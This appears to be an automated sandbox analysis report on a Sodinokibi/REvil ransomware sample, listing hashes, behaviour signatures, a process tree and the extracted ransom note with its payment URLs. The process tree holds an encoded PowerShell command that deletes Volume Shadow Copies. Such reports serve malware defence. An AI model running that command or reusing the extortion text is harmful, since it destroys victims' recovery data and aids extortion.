Analysis

  • max time kernel
    132s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:36

General

  • Target

    8ddf92f666f9ee9f33d44e2d0180accdf97c50911dbec871a35f8e5e1424cc07.exe

  • Size

    218KB

  • MD5

    5fb93b9a60f955ff9ee70f1555265b59

  • SHA1

    1a391bf6b975c152c6b70766820dacc7b91abaed

  • SHA256

    8ddf92f666f9ee9f33d44e2d0180accdf97c50911dbec871a35f8e5e1424cc07

  • SHA512

    4eddd9ba0600988b273606dc32bc8ffe86bfacfd12479e066273c38702b9ff074ff5acde0d6623ee28cd4e22783dd7a0183f8a362fb4fb8ac104bddb5cdb2c42

Malware Config

Extracted

Path

C:\4154m48-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 4154m48. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFE2AA45447D8825 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CFE2AA45447D8825 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: D4mrHElgsGChnPu/fsh0OSydjP+l+CzBsvHeSu/DPfc+5H5b4xbUaIEz5wmXDUkG cebfItOSO5Zuhot43d0JAucGknMKJIVpgHlPikn7SXsguNpvoHKRKqkFeuCLihYm 4MYrrJfFnMLC3cEAzG+GdP18SRRiNJt3Wth5Cec/oUkeEFEjt5d4W8tYZOwIqIEv mhzQ/iZvj5QkVYmdZOvlBRAoap4i/NoFkWnYGMRjkQcVxjr01EbNeyG9iCgX31GI 4jXn52DREYVx9H4Vd8Z1wZI3zE5eZFhHBsfgBcMSp3URnYCACaN5DK5oaviei2pK Heibm+JKkFksh0aN8+lhqaioJNUhR1Vi5JeD/LTHccYJPDkEVk7apyozJfgkAeX8 Em5HDBYlFMP4rD54MlasEsYaeq3UwUgEhn06RfWXJ8dk1V76Xs7y6rcZuO4hZOkI T1zekieCZ8w3D4ankCpuEWqawpzAoizHflpZPG/Jr1TJYbdRvQFXfDjJXIF4/eUx 3JS0x7JXI5xxa8P7BW85gptL3pAB/pmIzei/E1RPWBcK9DPVsuvm7ij57e2agQJ/ e5LcI7l4ntmn/2poCj8sSHWKd+ejR/w2qch2CauAv4NT9G9SGXQiZ14FBvD9UkQz e8LmKbxvveCjIOLxT/RTDc42NaM7jj0Q/w7PdJN0LiNv9Do2AvIJTVATcb+nZGAC 5vxvZwUY7BX+AFLcsLuJYVRL5gPYrbzYEYlL5W9peHy9nioqOPiJJCvbm9cu/U3q t9pAiS3lrJKQa2p+znrpXVucyEjX3x1NKbF5zuzZNk8rn+1ISqrnn+yngdrHeiWQ YqHQ/Vf6+xztA/1fZmRPMkP1wa25zN9Wy5y9Ls6BGBRf9HQredzsi7P9dwqClqNY oXro48408zrXpdxQ6uB6UVNEKQruVBskrPWYmGYKzT8/K8Qvicr/CfUUqgHREs2G Xb/+h+4zbr1IsdIOPia8Jw9VcdEFHBBcftGFFit0WaqDB39jq+RF6dO0UCUSndbC a3tkQI3fdWSxWHEPRPFykoUvdMxkhnVm34nSRpgPkS4+W9y0uu5NfASYNZz0AIIJ Ku19dM2uQghSk2rseGSTeuYUGimP8PQJPGSTAJyEOK8CmgzBokBc2Z22MKiCZDxR Ue5UPfwKIvoaKtE6mHEtpBwnyjTB4SX+wHHnyH7pK4YIJ75lkdy8l9XktXvClIZQ N8x3E77r+dGPqkIJbJeOrCC+Wr00B33xivdZa6snfF6+nQHGAe8D7FM86shRuAi0 7av02CJYogdYxlCdySg0HlbNQAk7pivPc8s= Extension name: 4154m48 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFE2AA45447D8825

http://decryptor.cc/CFE2AA45447D8825

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ddf92f666f9ee9f33d44e2d0180accdf97c50911dbec871a35f8e5e1424cc07.exe
    "C:\Users\Admin\AppData\Local\Temp\8ddf92f666f9ee9f33d44e2d0180accdf97c50911dbec871a35f8e5e1424cc07.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:268
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1500
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1152

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/268-56-0x000007FEFC031000-0x000007FEFC033000-memory.dmp

      Filesize

      8KB

    • memory/268-58-0x0000000002520000-0x00000000027D0000-memory.dmp

      Filesize

      2.7MB

    • memory/268-59-0x0000000002520000-0x00000000027D0000-memory.dmp

      Filesize

      2.7MB

    • memory/268-60-0x0000000002520000-0x00000000027D0000-memory.dmp

      Filesize

      2.7MB

    • memory/268-57-0x000007FEF3420000-0x000007FEF3F7D000-memory.dmp

      Filesize

      11.4MB

    • memory/268-61-0x000000001B710000-0x000000001BA0F000-memory.dmp

      Filesize

      3.0MB

    • memory/268-62-0x0000000002520000-0x00000000027D0000-memory.dmp

      Filesize

      2.7MB

    • memory/1620-55-0x00000000763F1000-0x00000000763F3000-memory.dmp

      Filesize

      8KB